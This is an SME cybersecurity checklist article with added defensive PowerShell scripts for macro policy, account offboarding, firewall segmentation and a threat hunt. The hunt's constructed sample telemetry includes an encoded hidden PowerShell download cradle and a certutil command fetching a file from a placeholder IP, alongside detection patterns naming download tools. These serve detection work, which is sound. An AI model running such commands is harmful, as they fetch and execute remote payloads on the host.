Checklist "Cybersecurity for SMEs": Valuable tips - Part 2
by Tina Siering
After presenting the first five of the most important cyber security measures for SMEs in the first part of our checklist, we follow up in the second part: We present five more essential measures that will help your company to increase security in cyberspace and strengthen resilience against current and future threats. Let's dive into the topic together and bring your company up to speed on cyber security.
Recommended reading: Part 1 of the series of articles.
Measure 6: Disable macros - close ransomware entry gates in advance.
Disabling macros is an effective and cost-free way to protect your business from ransomware attacks. Macros are small programs embedded in Office files such as Word, Excel or PowerPoint documents to automate processes (PDF files do not carry macros in this sense, but can contain embedded scripts that pose a comparable risk). While this feature can be useful, it also gives cybercriminals a way to execute their own code on a workstation and from there infiltrate and control IT systems.
For files containing macros, Office programs usually ask the user for permission to run them. The problem is that many users are not in a position to judge whether a file is legitimate, for example when it arrives from a supposedly trustworthy email sender. Current Office versions already block macros by default in files that carry the Mark of the Web (downloads and mail attachments), but that default only covers such marked files, and a user can still be talked into unblocking one.
To minimise the risk, the decision as to whether a macro may be executed should not be left to the users. Instead, it is advisable to prohibit the execution of macros by default for all users, for example via Windows Group Policy (the "VBA Macro Notification Settings" policy for each Office application).
If macros are nevertheless needed in your company, the administrator can sign the required macros with a code-signing certificate, distribute that certificate to the Trusted Publishers store, and set the policy to "Disable all except digitally signed macros"; every unsigned macro remains blocked. This protection mechanism can be set up with a few clicks and offers significant added value for your company's cyber security.
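The following PowerShell script is an added example, not code from the article: it writes, for the current user, the same registry values that the "VBA Macro Notification Settings" Group Policy setting writes, and reports whether each Office application is hardened. It assumes Office 2016/2019/365 (registry version 16.0); in a domain these values would be deployed via a GPO rather than by running the script per machine.

```powershell
# Added example, not code from the article: enforce the Office macro policy for the
# current user by writing the same registry values that the Group Policy setting
# "VBA Macro Notification Settings" writes. Assumptions: Office 2016/2019/365
# (registry version 16.0); in a domain you would deploy these values via a GPO
# instead of running this per machine.
$OfficeVersion = '16.0'
$Apps          = 'Word', 'Excel', 'PowerPoint'

function Set-MacroPolicy {
    # VBAWarnings: 1 = enable all, 2 = disable with notification (Office default),
    #              3 = disable all except digitally signed, 4 = disable all, no notification
    param([ValidateSet(3, 4)] [int] $VbaWarnings = 3)

    foreach ($app in $Apps) {
        $key = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$app\Security"
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }

        # Only macros with a trusted digital signature may run (3), or none at all (4)
        New-ItemProperty -Path $key -Name 'VBAWarnings' -PropertyType DWord `
            -Value $VbaWarnings -Force | Out-Null

        # Block macros in files carrying the Mark of the Web (downloads, mail
        # attachments) even if a user tries to enable them from the message bar
        New-ItemProperty -Path $key -Name 'blockcontentexecutionfrominternet' -PropertyType DWord `
            -Value 1 -Force | Out-Null
    }
}

function Test-MacroPolicy {
    # One row per application, usable for an audit report
    foreach ($app in $Apps) {
        $key   = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$app\Security"
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Application       = $app
            VBAWarnings       = $props.VBAWarnings
            BlockFromInternet = $props.blockcontentexecutionfrominternet
            Hardened          = (($props.VBAWarnings -in @(3, 4)) -and
                                 ($props.blockcontentexecutionfrominternet -eq 1))
        }
    }
}

Set-MacroPolicy -VbaWarnings 3   # signed macros only; use 4 to block macros entirely
Test-MacroPolicy | Format-Table -AutoSize
```

With VBAWarnings set to 3, the signing step described above is what makes the exception work: the administrator signs the VBA project (Developer > Visual Basic > Tools > Digital Signature) with an internal code-signing certificate and distributes that certificate to the Trusted Publishers store, also via GPO; macros carrying that signature run, everything else stays blocked. Check Test-MacroPolicy on a few workstations after the GPO has applied rather than trusting the policy report alone.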
Measure 7: Effective separation of IT domains as the key to greater cybersecurity
It is crucial to separate IT applications that do not need the internet from it, and to separate users and systems from each other, in order to minimise risks such as data exfiltration, unauthorised intrusion, identity theft and misuse of company systems. To do this, set up an individual user account for each employee and avoid shared group accounts: only then can actions be traced to a person and access be revoked individually. Everyday work, and web browsing in particular, must be done with accounts without administrator rights, so that a compromised browser or document cannot take over the whole system. Normal users must not be given administrator rights, as this greatly increases the damage malicious code can do once it runs.
Administrator rights remain with administrators and are used only for system configuration and software installation, never for email or web browsing. In addition, the access rights of employees who leave the company must be revoked promptly and completely (account disabled, password reset, group memberships removed, VPN and cloud access withdrawn) so that neither they nor third parties can continue to use them.
For SMEs with a larger number of employees, additional segmentation measures are advisable. These include blocking direct connections between workstation computers by default (for example with host-based firewall rules), so that malware that lands on one workstation cannot spread laterally to the next. Administration of the company network should be carried out exclusively from dedicated administration PCs with separate administrator accounts.
Another important measure is to divide IT activities into different network zones (e.g. internal servers, servers reachable from the internet, workstation computers, an administration zone, industrial systems, etc.), with traffic between zones restricted to what is actually required. This can be achieved with physical or virtualised filters, typically VLANs behind a filtering router or firewall. The strict separation of IT areas contributes significantly to improving cyber security in SMEs and minimises the attack surface available to cyber criminals.
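The two account-hygiene tasks from these paragraphs, finding normal users who hold local administrator rights and revoking a leaver's access, as an added PowerShell example that is not code from the article. It assumes an Active Directory domain called CORP, the RSAT ActiveDirectory module, and that it runs from a dedicated administration workstation with an admin account; the group names, the quarantine OU and the user name are illustrative placeholders.

```powershell
# Added example, not code from the article. Assumes an Active Directory domain
# named CORP, the RSAT ActiveDirectory module, and that it is run from a dedicated
# administration workstation with an admin account. Group names, the quarantine OU
# and the user name are illustrative placeholders.
Import-Module ActiveDirectory

function Find-UnexpectedLocalAdmins {
    # Lists members of the local Administrators group that are not on the allow-list,
    # i.e. normal users (or stale accounts) holding admin rights on this machine.
    param([string[]] $Allowed = @("$env:COMPUTERNAME\Administrator",
                                  'CORP\Domain Admins',
                                  'CORP\Workstation-Admins'))
    Get-LocalGroupMember -Group 'Administrators' |
        Where-Object { $Allowed -notcontains $_.Name } |
        Select-Object Name, ObjectClass, PrincipalSource
}

function Revoke-LeaverAccess {
    # Offboarding in the order that closes the most doors first.
    param([Parameter(Mandatory)] [string] $SamAccountName,
          [string] $QuarantineOu = 'OU=Disabled Accounts,DC=corp,DC=example')

    $user = Get-ADUser -Identity $SamAccountName -Properties MemberOf

    # 1. Disable: no further interactive, network or service logon with this account
    Disable-ADAccount -Identity $user

    # 2. Reset the password to a random value so the old one is worthless even if it
    #    was shared, written down or cached somewhere
    $bytes = [byte[]]::new(24)
    [System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($bytes)
    $newPassword = ConvertTo-SecureString ([Convert]::ToBase64String($bytes)) -AsPlainText -Force
    Set-ADAccountPassword -Identity $user -Reset -NewPassword $newPassword

    # 3. Remove all group memberships (file shares, VPN groups, admin groups ...);
    #    the primary group (Domain Users) is not listed in MemberOf and stays
    foreach ($groupDn in $user.MemberOf) {
        Remove-ADGroupMember -Identity $groupDn -Members $user -Confirm:$false
    }

    # 4. Park the object in a quarantine OU so it stands out in access reviews
    Move-ADObject -Identity $user.DistinguishedName -TargetPath $QuarantineOu

    # Return the resulting state for the offboarding record
    Get-ADUser -Identity $SamAccountName -Properties MemberOf |
        Select-Object SamAccountName, Enabled, DistinguishedName,
                      @{ n = 'Groups'; e = { $_.MemberOf.Count } }
}

Find-UnexpectedLocalAdmins
Revoke-LeaverAccess -SamAccountName 'm.mueller'
```

This covers the on-premises directory only. Cloud identities, SaaS tokens, VPN certificates and any shared mailbox or service password the person knew need the same treatment on the day of departure, and Find-UnexpectedLocalAdmins is worth scheduling across all workstations, since local admin rights granted "temporarily" tend to outlive the reason they were given.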
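The workstation-to-workstation block and the admin-zone exception described above, as an added example using the Windows Defender Firewall cmdlets; it is not code from the article. The addressing is an assumption for illustration (workstations in 10.10.0.0/16, administration zone in 10.99.0.0/24), and in practice the rules would be distributed via GPO.

```powershell
# Added example, not code from the article: host-based segmentation on a workstation
# using the Windows Defender Firewall cmdlets. Assumed addressing (illustrative):
# workstations in 10.10.0.0/16, the dedicated administration zone in 10.99.0.0/24.
# Adjust both to your network plan; deploy via GPO rather than per machine.
$WorkstationSubnets = '10.10.0.0/16'
$AdminZone          = '10.99.0.0/24'
$RulePrefix         = 'SEG-'

function Set-WorkstationSegmentation {
    # Windows Firewall evaluates explicit Block rules before Allow rules, so one block
    # rule scoped to the workstation subnet overrides every broad allow rule (file and
    # printer sharing, remote assistance, ...) that an installer may have added.
    Get-NetFirewallRule -DisplayName "$RulePrefix*" -ErrorAction SilentlyContinue |
        Remove-NetFirewallRule

    New-NetFirewallRule -DisplayName "${RulePrefix}Block workstation-to-workstation" `
        -Direction Inbound -Action Block -RemoteAddress $WorkstationSubnets `
        -Profile Domain, Private -Enabled True | Out-Null

    # Remote management (WinRM 5985/5986, RDP 3389) only from the administration zone
    New-NetFirewallRule -DisplayName "${RulePrefix}Allow management from admin zone" `
        -Direction Inbound -Action Allow -Protocol TCP -LocalPort 5985, 5986, 3389 `
        -RemoteAddress $AdminZone -Profile Domain -Enabled True | Out-Null
}

function Get-SegmentationState {
    # Report the rules with their address scope, e.g. for a compliance check
    Get-NetFirewallRule -DisplayName "$RulePrefix*" | ForEach-Object {
        $addr = $_ | Get-NetFirewallAddressFilter
        [pscustomobject]@{
            Rule    = $_.DisplayName
            Action  = $_.Action
            Remote  = ($addr.RemoteAddress -join ', ')
            Enabled = $_.Enabled
        }
    }
}

Set-WorkstationSegmentation
Get-SegmentationState | Format-Table -AutoSize
```

Two caveats: the block rule protects the receiving workstation, so it must be present on every workstation to be effective, and the admin-zone exception only makes sense if administration PCs really sit outside the workstation subnet, which is exactly why the article asks for a dedicated administration zone. The host-based rules are the last line; the zone separation itself still belongs on the network (VLANs and a firewall between them).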
Measure 8: Basic IT security measures
Implementing basic IT security measures is essential for SMEs. These include anti-virus programs and firewalls, which must be kept up to date to provide the required protection. Virtual private networks (VPNs) provide a secure communication channel by establishing encrypted connections between remote devices and the company network across the internet. Anti-phishing measures (email filtering and user awareness) protect against fraudulent emails and websites that aim to capture sensitive data.
Another important protection mechanism is multi-factor authentication (MFA), which requires two or more credentials of different types to access a system or confirm a transaction. The factors are something the user possesses (e.g. a mobile phone or smart card), something the user is (biometric features) or something the user knows (a password or PIN), and they must be independent of each other so that compromising one does not compromise the other. Common combinations are password + one-time code on the smartphone, PIN + smart card, or identity card + iris scan. A password combined with a security question is not MFA, since both are knowledge factors; and codes sent by SMS are the weakest second factor, so an authenticator app or hardware token is preferable where possible.
Measure 9: Proactive attack detection by means of cyber threat hunting - a crucial, additional layer of security.
The key difference to traditional IT security measures such as a firewall or antivirus software is the active approach: traditional tools offer passive protection and are suited to warding off general and known threats. Cyber threat hunting, on the other hand, is an active, hypothesis-driven process. Through proactive and iterative searches, the company's own network and endpoints are continuously monitored and searched for indicators of compromise (IOCs) and for the behaviour patterns (tactics, techniques and procedures) that attackers leave behind even when no known IOC matches. This is done with tooling that collects and analyses endpoint and network telemetry in depth.
The idea behind this is to identify conspicuous behaviour patterns at an early stage and thereby detect intruders in the network promptly. This enables immediate intervention and significantly reduces the time attackers spend undetected in your network (the dwell time).
Existing techniques are not replaced but supplemented; in combination, this gives you a significantly higher level of IT security. The key advantage of actively searching for threats is that intruders are detected in your network before they can cause damage, because without it a compromise often goes unnoticed for months (the average cited here is around six months).
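One threat hunt in code, as an added example that is not from the article and not any vendor's product. The hypothesis follows from measure 6: a malicious macro typically shows up as an Office application spawning a script host. The events in the block are constructed sample data, not real logs; the Get-ProcessCreationEvents function shows how the same fields are read from the real Windows Security log (event 4688) on a host where process creation and command-line auditing are enabled.

```powershell
# Added example, not code from the article and not a vendor's product: one threat
# hunt over process-creation telemetry. Hypothesis (from measure 6): an Office
# application spawning a script host is how a malicious macro usually executes.
# $SampleEvents is constructed sample data (not real logs) in the field layout of
# Windows Security event 4688; Get-ProcessCreationEvents pulls the real events.
$OfficeParents = 'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe'
$ScriptHosts   = 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe',
                 'mshta.exe', 'rundll32.exe', 'regsvr32.exe', 'certutil.exe'

# Constructed sample telemetry. Two hits, two benign events (splwow64.exe is the
# print helper Office legitimately starts; it is not a script host).
$SampleEvents = @(
    [pscustomobject]@{ Time = '2024-03-04 09:12:01'; Host = 'WS-017'; User = 'CORP\m.mueller'
        Parent      = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        Process     = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA' }
    [pscustomobject]@{ Time = '2024-03-04 09:12:03'; Host = 'WS-017'; User = 'CORP\m.mueller'
        Parent      = 'C:\Windows\explorer.exe'
        Process     = 'C:\Program Files\Google\Chrome\Application\chrome.exe'
        CommandLine = '"chrome.exe" --profile-directory=Default' }
    [pscustomobject]@{ Time = '2024-03-04 10:40:55'; Host = 'WS-042'; User = 'CORP\s.schmidt'
        Parent      = 'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
        Process     = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'cmd.exe /c certutil -urlcache -split -f http://203.0.113.7/invoice.dat %TEMP%\invoice.dat' }
    [pscustomobject]@{ Time = '2024-03-04 11:02:10'; Host = 'WS-042'; User = 'CORP\s.schmidt'
        Parent      = 'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
        Process     = 'C:\Windows\splwow64.exe'
        CommandLine = 'C:\Windows\splwow64.exe 12288' }
)

function Find-SuspiciousProcessChains {
    param([Parameter(Mandatory)] [object[]] $Events)
    foreach ($e in $Events) {
        $parent  = [IO.Path]::GetFileName($e.Parent).ToLowerInvariant()
        $child   = [IO.Path]::GetFileName($e.Process).ToLowerInvariant()
        $reasons = @()
        if (($parent -in $OfficeParents) -and ($child -in $ScriptHosts)) {
            $reasons += "Office application ($parent) spawned $child"
        }
        # -match is case-insensitive in PowerShell
        if ($e.CommandLine -match '\s-(e|ec|enc|encodedcommand)\s') {
            $reasons += 'encoded PowerShell command line'
        }
        if ($e.CommandLine -match 'downloadstring|downloadfile|invoke-webrequest|\biwr\b|urlcache|bitsadmin') {
            $reasons += 'download cradle'
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Time = $e.Time; Host = $e.Host; User = $e.User
                Parent = $parent; Process = $child
                Reasons = ($reasons -join '; '); CommandLine = $e.CommandLine
            }
        }
    }
}

function Get-ProcessCreationEvents {
    # Maps Security event 4688 (needs "Audit Process Creation" plus "Include command
    # line in process creation events") onto the same fields as the sample data.
    param([int] $Hours = 24)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time = $_.TimeCreated; Host = $_.MachineName
                User = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
                Parent = $data.ParentProcessName; Process = $data.NewProcessName
                CommandLine = $data.CommandLine
            }
        }
}

# Run the hunt over the constructed sample; on a real host use:
#   Find-SuspiciousProcessChains -Events (Get-ProcessCreationEvents -Hours 24)
Find-SuspiciousProcessChains -Events $SampleEvents | Format-Table -AutoSize
```

Run against the sample, the hunt flags the first event (Office parent plus an encoded command line) and the third (Office parent plus a certutil download), and stays silent on the browser start and the print helper. That is the shape of hunting as the text describes it: a hypothesis, a query over telemetry you already collect, a handful of results to triage, and then the next hypothesis; a commercial service differs in scale and in the telemetry it has, not in the principle.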
Especially for small security teams, an outsourced Security Operations Centre (SOC), for example Allgeier secion's Active Cyber Defense (ACD), can be an effective and cost-efficient way to increase network security while relieving internal IT security teams.
Measure 10: Incident Response Readiness - The Basis for Successful Attack Defence
To remain capable of acting in an emergency, companies need well-rehearsed incident response processes. Their effectiveness should be assessed against the ability to actually contain and defend against attacks, and improved with a catalogue of measures, for instance drawn up together with cyber security consultants. The earlier and more systematically the right measures are taken, the better potential damage can be limited.
A comprehensive incident response readiness strategy includes detailed guidelines and processes covering the following areas:
- Organisation: clearly defining roles, responsibilities and accountabilities in the event of a cyber-attack.
- Guidelines and standards: Compliance with legal and regulatory requirements regarding response time and reporting channels.
- Technology: Effective tools for continuous and immediate detection of cyber threats, supported by up-to-date threat intelligence.
- Processes: Clear procedures for various emergency scenarios and instructions for employees in the event of a security incident.
- Training: Ensuring the necessary expertise and regular testing of security processes at technical and management level.
- Assessment: Continuous review by cyber security experts of whether the defence measures and incident response procedures still hold up against current threat scenarios.
Whether your company meets the prerequisites for effective security incident management should be answered by a comprehensive analysis, followed by continuous improvement of the incident response readiness strategy.
SME cybersecurity can be significantly improved through targeted measures such as disabling macros, segregating IT domains, comprehensive IT baseline protection, early attack detection and a solid incident response readiness strategy. By implementing these essential security practices, businesses can increase their resilience to cyber threats and protect business-critical data and systems.